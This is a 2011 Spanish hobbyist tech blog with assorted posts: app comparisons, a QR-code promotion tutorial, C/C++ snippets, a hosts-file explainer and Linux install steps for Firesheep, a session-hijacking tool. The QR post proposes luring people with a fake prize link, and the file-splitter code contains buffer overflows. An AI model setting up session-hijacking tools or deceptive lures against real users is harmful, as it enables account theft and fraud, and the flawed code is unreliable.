RSS FEED

25 nov. 2011

WhatsApp vs LiveProfile

LIVEPROFILE  VS    WHATSAPP

Muchos conocemos la aplicación de mensajería instantánea WhatsApp, un programa que nos permite enviar mensajes cortos, gratuitamente, entre SmartPhones, es una aplicación que ha revolucionado la forma de comunicarnos, pero que sigue teniendo algunas desventajas.

Para competir con WhatsApp aparece LiveProfile, otra aplicación de mensajes instantáneos, gratuita, y disponible para Iphone, BlackBerry, Android y próximamente Symbian.
Este nuevo programa trae bastantes ventajas, que más adelante analizaré.

Imagenes de los programas:



LIVEPROFILE


WHATSAPP 

Ventajas/Desventajas:



Tengo que aclarar, que LiveProfile, dará soporte a Symbian próximamente. Y que WhatsApp, solo es gratuito el primer año, no como LiveProfile que en su web manifiestan que es una aplicación 100% gratuita.

Os dejo enlaces a sus webs por si quereis más información sobre las aplicaciones:

Enlaces:


LiveProfile
WhatsApp




Espero que os haya gustado.

23 nov. 2011

El doodle de Google para Stanislaw Lem.



Hoy Google aparece con un homenaje a Stanislaw Lem, autor polaco de ciencia ficción.

El buscador celebra hoy el aniversario número 60 de su primera publicación, Los astronautas, a la que siguió una extensa lista de obras, entre las que se destacan títulos como El hombre de Marte, El hospital de la transfiguración, El retorno de las estrellas o Solaris y Ciberiada, que hablan del futuro tecnológico.


El doodle de Stanislaw Lem es una maravilla visual que les dará un buen rato de entretenimiento. A través de una serie de pruebas matemáticas, profundizamos en una de las ideas que más marcó la obra de Stanislaw Lem: el diálogo entre el hombre y la máquina. Y es que, además de que el escritor tuvo una repercusión mundial en la ciencia ficción, sus relatos y novelas tienen un calado filosófico que, tal vez, tengan más sentido que nunca ahora, en un mundo guiado por redes sociales y teléfonos inteligentes.

Suerte con el Doodle: www.google.com

17 nov. 2011

El mundo del juego y sus estrategias

De acuerdo a la encuesta que realicé hace tan solo unas semanas, hoy he decidido hablaros
sobre un tema conocido por todos: el mundo del juego y sobre las guías con noticias y artículos
de estrategia de casino que existen para que todos aquellos que estén interesados en el juego puedan conocer todo lo relacionado con este.

Cada vez son más las actividades que se realizan a través de la red y los casinos, al igual que el
resto de empresas, están ofreciendo sus servicios por internet.

Debido a la gran cantidad de salas de juego que han aparecido con la llegada de internet,
el usuario se ve abordado y, en caso de querer jugar alguna partida a las tragamonedas o
cualquier otro juego de casino, necesita ayuda de alguna guía que le pueda recomendar qué
casino ofrece mejor trato a sus visitantes.

Las guías de casino que hay en internet ofrecen toda la información que el internauta puede
necesitar antes de decidirse a jugar unas partidas ya que clasifican la información ofrecida para
que esta pueda ser encontrada con facilidad.

La llegada de los smartphones, las tabletas y todos los productos de Apple, que cada vez tienen
más aceptación entre el público, ha hecho que la compatibilidad con el software sea uno de los
aspectos más importantes a tener en cuenta.

Las diferentes soluciones que han ofrecido las salas de juego son versiones sin descarga que
pueden ser jugadas directamente desde el navegador y programas compatibles con iOS,
android o symbian, aunque no todos los casinos ofrecen estas soluciones.

Si quieres jugar al casino desde tu dispositivo, sea cual sea, puedes consultar cualquier guía
en internet para saber qué salas te ofrecen software compatible con él y así evitar tener que
buscar esta información visitando uno por uno los casinos más conocidos de la red.

15 nov. 2011

Publicidad a tu web, mediante el móvil.

Publicidad a tu web, mediante el móvil.


Todos sabemos, muchos sistemas de dar a conocer nuestra página, pues con la proliferación de Smartphones inteligentes, podemos aprovecharlos para publicitarnos.
El sistema consiste en crear un código QR (luego explicaré lo que es), que contenga una dirección de nuestra web, este sistema esta apareciendo recientemente. Lo podemos encontrar en grandes centros comerciales, para hacer publicidad, hacernos entrar en un sorteo,etc.. Y gracias a esto, podemos hacer que la gente que escanee el código QR, y se les redirija a nuestra página.

Bueno, para quien no sepa lo que es un QR-code, es un sistema para almacenar texto, como un código de barras.

Os dibujo un esquema de como funciona:


Mas información en: Código QR

Para realizar la publicidad con este sistema, primero nos metemos en un generador de links..

         1 - Yo uso smlk, para crearme un link que "atraiga" a la gente, como por ejemplo http://smlk.es/premioaudi-a4.




         2 - Desde un generador de QR-codes, introducimos http://smlk.es/premioaudi-a4, nuestra URL camuflada. El generador que podemos usar, es este generador-qr-code. Una imagen de como he realizado yo mi QR-CODE.



         3 - Coger ese QR-CODE y con un poco de imaginación difundirlo.. como si fuera por ejemplo el link a un premio. Cuanto más utilizado sea en todo el mundo este sistema, más nos podemos beneficiar.
Ahora pondré algunas imágenes, de como lo lee el móvil.








Así acaba este pequeño tutorial, de como publicitar nuestra web mediante el móvil y los códigos QR. Si te ha gustado comenta, poniendo que te ha parecido.

Gracias

Resultado sobre la encuesta de publicidad.

Hace tiempo, publiqué una entrada sobre si implementaba publicidad en el blog, esta es la entrada en cuestión:  Publicidad en el blog

Bien pues la encuesta está cerrada y estos han sido los resultados.


Ahora lo que me pensaré será que sistema de publicidad le pondré.

Muchas gracias por los que participaron en la encuesta.

Espero que os guste la entrada de arriba ;)

Saludos.

12 nov. 2011

Divisor de archivos [C/C++]

Divisor de archivos [C/C++]


Pues estuve siguiendo con C++ y me encontre con una función muy interesante en fstream, que es la posibilidad de hacer una especie de "divisor de archivos" metí la posibilidad de darle otra extensión al archivo dividido.

Pongo el code y lo explico luego:


#include <iostream>
#include <fstream>
#include <windows.h> //usalo si vas  a usar el GetFileAtributes
using namespace std;
char FileName[MAX_PATH] = "",ext[5] = "",archivo2[] = "",bytes[20][10000000];
int Num,tam,posicionmemoria = 0,sizeyadividido;
int main(void)
{
cout << "\nEscribe un archivo existente: ";
    cin.getline(FileName, MAX_PATH);
    if(GetFileAttributes(FileName) ==  0xFFFFFFFF)
    {
    cout << "\nArchivo erroneo";
    cin.get();
    return 0;
    }
    cout << "\nEscribe una extension: ";
    cin.getline(ext, MAX_PATH);
    cout << "\nSeparaciones(+2): ";
    cin >> Num;
if(Num < 2)
{
cout << "\nError,no se puede separar el archivo en "<<Num<<"parte/s";
cin.get();
return 0;
}



ifstream IFile(FileName, ios::binary);
IFile.seekg(0, ios::end);
tam = IFile.tellg();
sizeyadividido = tam / Num;
IFile.seekg(0, ios::beg);
for(int i = 0; i< Num; i++)
IFile.read(bytes[i], sizeyadividido);
IFile.close();
for(int i = 0; i < Num; i++)
{
sprintf(archivo2, "%d_%s.%s", i, FileName, ext);
ofstream OFile(archivo2, ios::binary);
OFile.write(bytes[i], sizeyadividido);
OFile.close();
}
cout << "\n"<< FileName << " se dividio en  " << Num << " archivos";
cin.get();
return EXIT_SUCCESS;
}

Primero declaramos todas las variables, librerías y demás.
Ponemos el nombre y extensión de un archivo que este EN EL MISMO LUGAR que nuestro ejecutable.

Entonces tenemos la función GetFileAtributes que nos dice si existe o no y si tiene los atributos suficientes para poder dividirlo.


¿Por qué 0xFFFFFFFF?

Porque si la función falla el valor de retorno es 0xFFFFFFFF o INVALID_FILE_ATTRIBUTES cosa que nos permite saber lo anteriormente comentado.

Luego se le implementa la extensión y el numero de partes,(lógicamente tiene que ser mayor de dos)

Y luego ya empieza el codigo verdadero comienza a leer los bytes del archivo y divide su tamaño por las partes que hemos pedido y con eso le damos el valor a sizeyadividido que en realidad serian los bytes por parte.

Llega el primer for con el que se lee todo el code y en el segundo se escribe todo(extensión, nombre,  contenido, bytes) hasta for(int i = 0; i < Num; i++) sencillo,¿no?

7 nov. 2011

Detectar intrusos WI-FI y bloquearles el acceso.



Detectar intrusos WI-FI y bloquearles el acceso.



Con la existencia del Internet sin cables(Wireless), también aparecieron personas que decidian meterse en redes Wi-Fi ajenas. Lo cual, nos perjudica, pues perdemos velocidad, y si comete algún acto delictivo desde nuestra red, podemos tener una sorpresa.

Si pensais que alguien está dentro de vuestra red, seguid estos pasos.

1º Para comprobarlo


         1-Te metes en consola, tecleas ipconfig.
         2-Buscas la puerta de enlace predeterminada( Ej.: 192.168.1.1)

         3-Buscas de alguna lista, como esta, la contraseña y user de tu router.


          4-Entras en la opción de DHCP, y ya puedes ver ahí las IPs de los ordenadores que están conectados y su respectiva MAC.




2º Para bloquearle la conexión

         1-Desde el mismo router, buscas la opción de MAC Filter.
         2-Lees como se usa
         3-Bloqueas su MAC, averiguada en el paso 4 anterior.



          Espero que os haya gustado, y os sea útil. 

¡Saludos!


5 nov. 2011

Todo Internet pesa lo mismo que una fresa

¿No sabías que Internet pesa? ¿No sabias cuanta pesa? Pues sigue leyendo..


Diario Ti: Recientemente, el catedrático John Kubiatowicz, de la Universidad Berkeley de California afirmó que el peso de un libro digital de 4 GB sería de 0.000000000000000001g, un attogramo (1ag). El cálculo está basado en la fórmula E=mc², de Albert Einstein.

Desarrollando esta idea, los responsables del canal de YouTube vsauce, calcularon que la totalidad de los contenidos publicados en Internet pesan 50 gramos; es decir, el equivalente de una fresa.

En éste vídeo, "Michael" explica (en inglés) la teoría completa, sustentada en las observaciones de Kubiatowicz.


Fuente: http://www.diarioti.com/noticia/Toda_Internet_pesa_lo_mismo_que_una_fresa/30727

31 oct. 2011

Crackme v1




Crackme, programado por mi en Visual Basic 6. El reto es simple, consigue el User y el Pass, a cambio regalo el código fuente y el programa completo del SMS-Sender. +info
El usuario y la contraseña, me la dejais, en un e-mail, enviado a la dirección:

anesevillaatienza137@gmail.com


De todos modos, podéis comentar aunque sea en anónimo, poniéndome que lo habéis resuelto.

Mucha suerte.


Links de descarga:



http://www.megaupload.com/?d=0KCTVYSA

http://rapidshare.com/files/377721057/crackme.rar.html

http://www.mediafire.com/?ai2ck33mvhs30d8

23 oct. 2011

Archivo hosts. ¿Qué es y para qué sirve?


El archivo hosts, es el archivo que utiliza el sistema para para guardar la correspondencia entre dominios de Internet y direcciones IP.
Esta es una de las maneras que usa el sistema para resolver nombres de dominios, anteriormente a la aparición de servidores DNS, el archivo hosts era la única manera de resolver nombres de dominios. Este es un uso, de este archivo, pero tiene varios usos más que comentaré posteriormente.

En definitivo, es un archivo de texto plano que puede ser editado por el administrador(root) del sistema, su ubicación es variable según el sistema.

Ubicación:



Formato:


  • Se debe introducir la dirección IP a la que resolverá, uno o más espacios o tabulaciones y el dominio de Internet a resolver.
  • Se pueden introducir más de un dominio a resolver en la misma línea separados por uno o más espacios o tabulaciones.
  • Cada correspondencia de dirección IP y dominio debe ir en una línea distinta.
  • Las líneas que comienzan por # se consideran comentarios y no se computan.
  • Las líneas en blanco tampoco se computan.

Por defecto, el archivo hosts contiene la definición de localhost:
127.0.0.1 localhost
Es necesaria esta línea, y no puede ser borrada.

Usos:


- Redirigir dominios locales, y para poner a prueba sitios en desarrollo por parte de los programadores.

-Bloquear webs, el archivo hosts, se usa también, para bloquear páginas de publicidad, páginas maliciosas (que contengan spyware o adware). Para poder bloquear una web, procedemos a utilizar una IP inválida, para redirigir esa web:

255.255.255.0 www.ejemplo.com


Riesgos:

-Algunos virus, troyanos, etc..malware en general; utilizan el archivo hosts, para bloquear las páginas de ayuda de los fabricantes de antivirus, haciendo así imposible, consultar la ayuda.
A veces también pueden hasta bloquear las actualizaciones de Windows Update, dejando así al sistema Windows desactualizado y en peligro.

-Otro riesgo, es el pharming, el archivo hosts puede ser modificado malintencionadamente y así redirigir una página web a una copia fraudulenta, que puede robar datos personales.


Por ello, lo mejor es que hosts tenga como atributos, "Solo lectura" para evitar que el malware edite su contenido. Espero que esta publicación sirva para el bien (o para el mal) a mucha gente. Saludos

19 oct. 2011

1 año de Blog.



¡FELICIDADES!


Hace un añito, creaba un blog, DaraxBlog, nunca pensé que lo seguiría manteniendo un año después, ni que estaría tan activo, como a día de hoy lo está. No es gran cosa, todo hay que admitirlo, tiene pocas publicaciones, porque su dueño está bastante ocupado.

Solo me queda agradecer a cualquier persona, que lo haya leído alguna vez, que le haya comentado a un amigo, de la existencia de esta web, y agradecerte a ti, que estás leyendo esto.

Sin duda, la entrada que más os parece gustar es el mini-tutorial de WireShark. Mis metas, son seguir publicando aportes que os sigan interesando, y continuar, la historia de este blog personal.

Muchas gracias a todos, Darax.

16 oct. 2011

¿Como solucionar todos los virus USB?




Muchos virus usan el tan conocido método de propagación por USB, el cual consiste en infectar el archivo autorun.inf.

La mayoría de los virus crea un archivo autorun.inf que contiene la ruta / ubicación de los virus en la raíz de cada unidad y al hacer doble clic en la unidad para abrirla el virus también se activa con la ayuda de ese fichero infectado.

Para solucionar esto, debemos seguir los siguientes pasos:

Primero de todo eliminar el archivo autorun.inf, que sino podemos manualmente haremos esto:

1º Desactivar temporalmente el AntiVirus, ir a la consola de comandos(cmd.exe) irnos a la unidad y escribir el siguiente comando:
attrib -h -r -s autorun.inf

2º Ahora lo borramos desde la unidad, pues se habrá hecho visible y ahora reactivamos el AntiVirus.

3º Creamos una carpeta llamada autorun.inf así ya estaremos seguros de que ningun malware pueda crearnos otro fichero infectado y fastidiarnos el USB o nuestro ordenador.

Saludos!

10 oct. 2011

ScreenShot en C

El code no es mio, lo encontré en Internet, y como a mi me ha servido, quizás a vosotros también os sirva.

El uso es muy simple, creas un nuevo proyecto y agregas la librería "captura.h" y el "main.cpp".

Es importante saber nuestra resolución de pantalla, para poder modificar correctamente esta instrucción:

CapturaPantalla(0,0,800,600,name);

captura.h
Código:
PBITMAPINFO CreateBitmapInfoStructure(HBITMAP hBmp)
{
BITMAP bmp;
PBITMAPINFO pbmi;
WORD cClrBits;

//obtiene la altura, anchura, y profundidad del color de la imagen
if(!GetObject(hBmp,sizeof(BITMAP),(LPSTR)&bmp))return NULL;

cClrBits = 24;

/*
reserva la memoria para la estructura PBITMAPINFO, que contendrá la informacion
de la cabecera
*/
if(cClrBits!=24)
pbmi=(PBITMAPINFO)LocalAlloc(LPTR,sizeof(BITMAPINFOHEADER)+sizeof(RGBQUAD)*(1<<cClrBits));
else
pbmi=(PBITMAPINFO)LocalAlloc(LPTR,sizeof(BITMAPINFOHEADER));

//inicializa la estructura
pbmi->bmiHeader.biSize = sizeof( BITMAPINFOHEADER );
pbmi->bmiHeader.biWidth = bmp.bmWidth;
pbmi->bmiHeader.biHeight = bmp.bmHeight;
pbmi->bmiHeader.biPlanes = bmp.bmPlanes;
pbmi->bmiHeader.biBitCount = 24;

if(cClrBits<24)pbmi->bmiHeader.biClrUsed=(1<<cClrBits);

pbmi->bmiHeader.biCompression = BI_RGB;
pbmi->bmiHeader.biSizeImage=(pbmi->bmiHeader.biWidth+7)/8*pbmi->bmiHeader.biHeight*cClrBits;
pbmi->bmiHeader.biClrImportant = 0;

return pbmi;
}

HRESULT SaveBitmap(char strFileName[128],PBITMAPINFO pbi,HBITMAP hBMP,HDC hDC)
{
HRESULT hr = E_FAIL;
HANDLE hf; // file handle
BITMAPFILEHEADER hdr; // bitmap file-header
PBITMAPINFOHEADER pbih; // bitmap info-header
LPBYTE lpBits; // memorypointer
DWORD dwTotal; // total count of bytes
DWORD cb; // incremental count of bytes
BYTE *hp; // byte pointer
DWORD dwTmp; // temp-variable


if(pbi==NULL)return E_FAIL;

pbih=(PBITMAPINFOHEADER)pbi;
lpBits=(LPBYTE)GlobalAlloc(GMEM_FIXED,pbih->biSizeImage);

if(!lpBits)return E_FAIL;

if(!GetDIBits(hDC,hBMP,0,(WORD)pbih->biHeight,lpBits,pbi,DIB_RGB_COLORS))return E_FAIL;

//crea el .bmp
hf=CreateFile(strFileName,GENERIC_READ|GENERIC_WRITE,(DWORD)0,NULL,CREATE_ALWAYS,FILE_ATTRIBUTE_NORMAL,(HANDLE)NULL);

if(hf==INVALID_HANDLE_VALUE)return E_FAIL;

hdr.bfType = 0x4D42; // 0x42 = "B", 0x4D = "M"


hdr.bfSize=(DWORD)(sizeof(BITMAPFILEHEADER)+pbih->biSize+pbih->biClrUsed*sizeof(RGBQUAD)+pbih->biSizeImage);
hdr.bfReserved1=0;
hdr.bfReserved2=0;

hdr.bfOffBits=(DWORD)sizeof(BITMAPFILEHEADER)+pbih->biSize+pbih->biClrUsed*sizeof(RGBQUAD);


if(!WriteFile(hf,(LPVOID)&hdr,sizeof(BITMAPFILEHEADER),(LPDWORD)&dwTmp,NULL))return E_FAIL;

if(!WriteFile(hf,(LPVOID)pbih,sizeof(BITMAPINFOHEADER)+pbih->biClrUsed*sizeof(RGBQUAD),(LPDWORD)&dwTmp,(NULL)))return E_FAIL;


dwTotal=cb=pbih->biSizeImage;
hp=lpBits;

if(!WriteFile(hf,(LPSTR)hp,(int)cb,(LPDWORD)&dwTmp,NULL))return E_FAIL;
if(!CloseHandle(hf))return E_FAIL;

GlobalFree((HGLOBAL)lpBits);

return S_OK;
}

/*
uso: CapturaPantalla(posicion_inicial_x,posicion_inicial_y,posicion_final_x,posicion_final_y);
*/

void CapturaPantalla(unsigned int Ax,unsigned int Ay,unsigned int Bx,unsigned int By,char *Ruta)
{
BYTE *mem;
int bpp,c;
    HWND HwndSrc;
    HDC HdcSrc;
    HDC HdcMemory;
    HDC HdcStrech;
    HBITMAP Hbmp;
    HBITMAP HbmpStrech;
    HBITMAP HbmpPrev;
    HBITMAP HbmpPrevStrech;
    HBITMAP BmpPrueba;

HwndSrc=GetDesktopWindow();                               //almacena el manejador del escritorio
    HdcSrc=GetWindowDC(HwndSrc);                               //se obtiene el DC del escritorio
HdcMemory=CreateCompatibleDC(HdcSrc);                      //se crea una copia del DC del escritorio
HdcStrech=CreateCompatibleDC(HdcSrc);                   //Cd que almacenara la imagen pequeña
Hbmp=CreateCompatibleBitmap(HdcSrc,1024,768);          //se cra un bitmap del DC del escritorio
HbmpStrech=CreateCompatibleBitmap(HdcSrc,Bx-Ax,By-Ay);  //bitmap que almacenara el Strech
HbmpPrev=(HBITMAP)SelectObject(HdcMemory,Hbmp);        //se asocia el bitmap con el DC
HbmpPrevStrech=(HBITMAP)SelectObject(HdcStrech,HbmpStrech);

BitBlt(HdcMemory,0,0,800,600,HdcSrc,Ax,Ay,SRCCOPY);
    StretchBlt(HdcStrech,0,0,800,600,HdcMemory,0,0,800,600,SRCCOPY);
    HbmpStrech=(HBITMAP)SelectObject(HdcStrech,HbmpPrevStrech);
    Hbmp=(HBITMAP)SelectObject(HdcMemory,HbmpPrev);

bpp=800*600*8;

c=GetBitmapBits(HbmpStrech,0,0);
mem=(BYTE*)malloc((c-1)*sizeof(BYTE*));
memset(mem,0,sizeof(mem));

    GetBitmapBits(HbmpStrech,c,mem);
BmpPrueba = CreateCompatibleBitmap(HdcSrc,Bx-Ax,By-Ay);
SetBitmapBits(BmpPrueba,c,mem);
SaveBitmap(Ruta,CreateBitmapInfoStructure(BmpPrueba),BmpPrueba,HdcSrc);

    DeleteDC(HdcSrc);
    DeleteDC(HdcMemory);
    DeleteDC(HdcStrech);
    DeleteObject(Hbmp);
    DeleteObject(HbmpPrev);
    DeleteObject(HbmpStrech);
    DeleteObject(HbmpPrevStrech);

return;
}


main.cpp
Código:
#include <windows.h>
#include <iostream>
#include "captura.h"

using namespace std;

int main(int argc, char *argv[])
{
    char name[15];
    for(int i=0;i<10;i++)
    {
            name[0]='\0';
            strcat(name,"D:\\");
            char n[2];
            n[0]='\0';
            sprintf(n,"%i",i);
            strcat(name,n);
            strcat(name,".jpg");
    CapturaPantalla(0,0,800,600,name);
 Sleep(1000);
}
    system("PAUSE");
    return EXIT_SUCCESS;
}

6 oct. 2011

Steve Jobs fallece, el visionario del siglo XXI.


Así aparece hoy, la web de Apple, con una imagen llamada "t_hero", el cofundador de Apple ha fallecido.
El enigmático, reservado y visionario Steve Jobs, ha muerto hoy a los 56 años, ha anunciado Apple. Jobs era mucho más que el consejero delegado de Apple. Nunca antes una marca estuvo tan asociada a una persona. Su contribución al mundo tecnológico le convierte en uno de los grandes innovadores de los últimos 75 años, en un transformador de la industria. El Thomas Edison del siglo veintiuno hizo del ordenador un artilugio simple de usar, cambio la manera de hacer negocio con la música a través de Internet y lanzó la telefonía móvil en otra dimensión.

 La familia ha emitido un comunicado en el que explicaba que Jobs había muerto "en paz" y rodeado de sus seres queridos. "Sabemos que muchos de ustedes llorarán la pérdida con nosotros y les pedimos que respeten nuestra privacidad durante este momento de pena".
Apple fue fundada en abril de 1976, en un garaje en Los Altos (California), tal y como mandan los cánones del sueño americano. Al lado de Steve Jobs estaba su compañero de estudios y amigo Steve Wozniak. El dúo era perfecto. Jobs, que entonces tenía 21 años, se encargaba de las ideas y de vender el producto. Wozniak se dedicaba a las cuestiones de ingeniería que daban vida a complejos artilugios tecnológicos.
Así, y con un respaldo financiero de 90.000 dólares, nació su primera computadora, Apple I, con una visión: popularizar el uso de los ordenadores personales, llevándolos de las oficinas a las casas. En 1977 llegó su primer éxito, con el Apple II, la primera computadora producida en masa para el consumo. En tan sólo dos años, la facturación de la compañía se multiplicó por quince, de los 7,8 millones de dólares hasta los 117 millones, lo que les convirtió en multimillonarios antes de cumplir los 25 años.


La famosa manzana
El popular símbolo de la manzana con un bocado al lado derecho lo tomó de los Beatles, que utilizaban la imagen de la fruta del pecado original en sus discos a final de la década de los años 1960. La elección le costaría después una intensa batalla legal para su uso en la tienda electrónica iTunes, donde la música de la legendaria banda de Liverpool estuvo ausente hasta otoño de 2010. Era sólo el inicio de lo que estaba por llegar, en una época en el que el IBM era el gigante a batir.
Steve Jobs nació un 24 de febrero de 1955 en San Francisco. Sus padres biológicos, Abdulfattah Jandali -de origen sirio- y Joanne Schieble no estaban casados. Fue adoptado por Paul y Clara Jobs. Se crió en el seno de una familia con pocos recursos. Y abandonó la universidad, porque sabía que las oportunidades estaban fuera de las aulas.
A los 12 años, ya había escrito a William Hewlett para hacer unas prácticas en su compañía, HP. Le gustaba la ingeniería, y ya de niño no sólo tenía claro que sería rico, además tenía la ambición de llegar a ser uno de los más grandes entre los grandes, tan popular como Shakespeare o Einstein. A Jobs le fue diagnosticado un cáncer de páncreas en 2004. Lo hizo público un año después, en el discurso de graduación en la Universidad de Stanford. En abril de 2009 fue sometido a un transplante de hígado, tras negar durante meses los rumores sobre su delicado estado de salud. En septiembre de ese año reapareció en público para lanzar la tercera generación del popular reproductor iPod. Alarmantemente delgado, y con la voz muy débil, aprovechó para hacer campaña por la donación de órganos.
Aunque se le considera uno de los grandes innovares de la historia, no fue porque creara nuevos productos. Jobs ni inventó el ordenador personal, ni el ratón, ni los reproductores digitales de música, ni los teléfonos inteligentes, ni las tabletas, ni las tiendas electrónicas de música o de libros. Y estaba obsesionado con la competencia, a la que forzó a redefinir sus estrategias.
Jobs tuvo la capacidad de simplificar la tecnología existente y explotar su potencial, en el momento adecuado. El Mac que hoy se conoce debutó en el mercado en enero de 1984, como el primer ordenador que presentan todas sus funciones de una manera gráfica. Y lo dotó de un ratón, para que el usuario pudiera desplazar el cursor por la pantalla y con un simple click activar las funciones de los distintos programas. Simplificó la complejidad.
Un invento para la historia
El Macintosh marcó el futuro, a pesar de que sus funciones eran limitadas y su uso cuestionable. Para explotar el potencial de la nueva máquina, Jobs necesitaba un buen programa que le diera vida. En ese momento acudió buscando ayuda al joven Bill Gates, sin saber que con el paso del tiempo se convertiría en su gran rival en Microsoft. Su enemigo entonces era IBM. Las ventas decepcionaron y el PC del Big Blue dominaba de forma aplastante.
La tensión en el seno de Apple creció. Y un año después, Steve Jobs se vio forzado a abandonar la compañía por las diferencias que tenía con su entonces consejero delegado John Sculley, al que había contratado dos años antes de Pepsi. No estaban de acuerdo en cómo estaba llevando el negocio. Pero Sculley, un ejecutivo con más experiencia y madura, tenía el respaldo del consejo.
Los titulares de la época hablan del fin de una era. Pocos ejecutivos en la historia corporativa sufrieron un golpe así y lograron reponerse. Con 30 años, Jobs creó otra empresa, NeXT Computer en un intento por reinventar Apple con una ambición: cambiar el mundo. Pero tuvo serios problemas para abrir hueco en el mercado a un ordenador de esas características y a un precio tan alto como el que ofrecía. Los titulares de la época hablan del fin de una era. Pocos ejecutivos en la historia corporativa sufrieron un golpe así y lograron reponerse. Con 30 años, Jobs creó otra empresa, NeXT Computer en un intento por reinventar Apple con una ambición: cambiar el mundo. Pero tuvo serios problemas para abrir hueco en el mercado a un ordenador de esas características y a un precio tan alto como el que ofrecía.
El nacimiento de Pixar
El secretismo le permitió hacer ver más de lo que en realidad había. Y con la empresa rozando la bancarrota, se concentró en su sistema operativo y empezó a explorar nuevas oportunidades. En 1986 se hizo con la división gráfica por ordenador de Lucasfilm, por la que pagó 10 millones a George Lucas. Y así nacieron los estudios de animación Pixar, creadores de Toy Story y Finding Nemo.
Demostró a Hollywood que los ordenadores pueden dar rienda suelta a la imaginación y llegar al público general. La tecnología lo permitía. Robert Iger, entonces consejero delegado de Disney, lo entendió perfectamente y no se lo pensó dos veces antes de comprar Pixar por 7.500 millones. Empezaba así a forjarse una nueva era, en la que Jobs se consolidaría como una estrella.
NeXT sería adquirida por Apple en diciembre de 1996, por 400 millones. Y ocho meses después de integrarse en el gigante de la manzana, Steve Jobs fue nombrado consejero delegado interino de la compañía de Cupertino. Su puesto al frente de Apple se haría permanente en enero 2000, en lo que estaba llamado a ser en el retorno más importante en la historia corporativa de EE UU.
La vuelta del exilio
Todo lo que construyó en una década estaba destruido y hundido en pérdidas, y Microsoft dominaba el 80% del mercado de PC. Jobs se reincorporó tras 12 años de exilio a la compañía que creó cargado de ideas para resucitar Apple, como el iMac. La computadora fue lanzada un año después con un éxito rotundo. Pero lo que abrió sus productos al consumo en masa fue el reproductor iPod y la tienda electrónica iTunes, para la descarga legal de música.
Así rompió el nicho en el que estaba metido Apple, lanzando nuevos productos más allá de los PC y poco a poco la suerte de la compañía empezaría a cambiar. La cuadratura del círculo llegó en junio de 2007 con el teléfono móvil interactivo iPhone. Jobs consiguió así crear un atractivo de los consumidores hacia los Mac, que eran vistos como un club reservado al diseño y la publicidad. En la primavera de 2010 se le sumó la tableta iPad.
Steve Jobs, que se presentaba en público en vaqueros y camisa negra con cuello de tortuga, era una persona obstinada, apasionada, egocéntrica, arrogante y perfeccionista. Era también un genio de la promoción y la imagen. El anuncio que utilizó para el lanzamiento del primer Macintosh rompió moldes y está considerado como uno de los 50 mejores en la historia de la televisión. La estética es otra de las claves de su éxito, toda una declaración de diseño.
Jobs, imagen de Apple
Jobs era la imagen de Apple y su historia define la de la propia Silicon Valley. De hecho, podría decirse que hay un antes y después en el mundo tecnológico que lo marca Apple. Una combinación difícil de replicar que le permitió conectar la tecnología con las tendencias, y que explica el tsunami mediático que acompaña a cualquier artilugio que lanza al mercado.
Apple hace tambalear el mercado en el que penetra, porque sus productos son simples y marcan tendencia, como demuestra el caso del ratón. Y en torno a ellos es además capaz de crear un verdadero ecosistema, en el que todos conviven en armonía. Pero eso en Wall Street dicen que no es conveniente apostar contra Apple cuando lanza un nuevo producto.
La revista Fortune nombró por todo esto a Jobs "empresario de la década", y no sólo por la manera en la que llevó las riendas de Apple y su impacto en el mundo de los negocios. Los editores de la publicación financiera destacaron su influencia en la cultura mundial. "Cada día, algún estudiante, empresario o diseñador que se enfrenta a un problema se pregunta: ¿qué haría Jobs?".
Tan ingenioso como misterioso, Jobs fue el punto fuerte de Apple. Tres décadas durante las que redefinió o reinventó la tecnología de consumo, creando productos que el más corriente del ciudadano no sabía que iba a necesitar. Pero la imagen del "hombre de negro" está tan vinculada a la marca que eso le convierte a la vez en su principal vulnerabilidad.
Jobs sabía vender el producto, y tenía talento de distorsionar la realidad de tal manera que el público estuviera dispuesto a pagar más por ellos que los de la competencia. El éxito del iPhone, a pesar de sus problemas, es el más claro ejemplo. No era una cuestión de números, si no de emociones. Y eso es lo que crea todo tipo de preguntas sobre una Apple sin su gurú.

Fuente: ElPais

29 sept. 2011

Publicidad en el blog.



Tengo pensado poner publicidad en el blog dentro de nada, quizás sea AdSense, o quizás sea otro sistema de publicidad, pero en cualquier caso, sería algo que no cambiara radicalmente el estilo del blog.

Bueno, antes de hacer esto, quería proponer una encuesta para ver que os parece la idea, para los que a veces me vas leyendo el blog.

Quien quiera puede comentar si esta a favor o en contra. Tomare muy en cuenta los votos.

Saludos

12 sept. 2011

Firesheep, ahora en GNU/Linux.



Para quien no sepa que es FireSheep, hice un post de explicación e instalación: http://daraxblog.blogspot.com/2011/08/firesheep-consigue-cuentas-de-facebook.html

Pero ahora explicaré como instalarlo en GNU/Linux.

Primero descargaremos la extension de firesheep-0.1-1.xpi


Luego la instalaremos en firefox, ahora en la terminal realiza lo siguiente:

$ cd ~ # va a tu directorio home
$ cd .mozilla/firefox/yayzqldb.default/extensions/firesheep@codebutler.com/platform/Linux_x86-gcc3
$ sudo ./firesheep-backend --fix-permissions


Y listo ya tendrás la extensión trabajando en Mozilla Firefox.

Algunos problemas comunes:

A la hora de ejecutar el "sudo ./firesheep-backend --fix-permissions"
Te bota un error relacionado con "libpcap"
Para solucionarlo:

$ Sudo su #Loguearse como root
# cd /usr/lib/
# cp libpcap.so.1 libpcap.so.0.8

Otra manera, es hacer lo siguiente:

Descargamos las aplicaciones necesarias:


sudo apt-get install autoconf git xulrunner-dev libpcap-dev libboost-dev libhal hal-dev

Descargamos el codigo de FireSheep:


git clone git://github.com/mickflemm/firesheep.git


Esto nos crea una carpeta llamada firesheep entramos a ella y ejecutamos los siguientes comandos:


cd firesheep
./autogen.sh --with-xulrunner-sdk="/usr/lib/xulrunner-1.9.2.12"
git submodule update --init


Con esto ya terminamos la instalación en GNU/Linux. En la carpeta Build encontramos, firesheep.xpi. Ahora abrimos Firefox, como root.

alt+f2
gksudo firefox

Arrastramos la extensión, y reiniciamos. Cualquier duda, comentad en el blog.

8 sept. 2011

Fastidiar moviles con WhatsApp

Bueno, muchos conocereis esto:



Si, WhatsApp, una gran aplicación que viene con muchos de los smartphones actuales, y que se está convirtiendo en una aplicación muy utilizada por los jovenes(y no tan jovenes de hoy en dia).

Vulnerabilidad? yo no lo llamaría así. Simplemente es una putada, de las típicas mias jaja (Aunque fue un colega el que me la dijo)

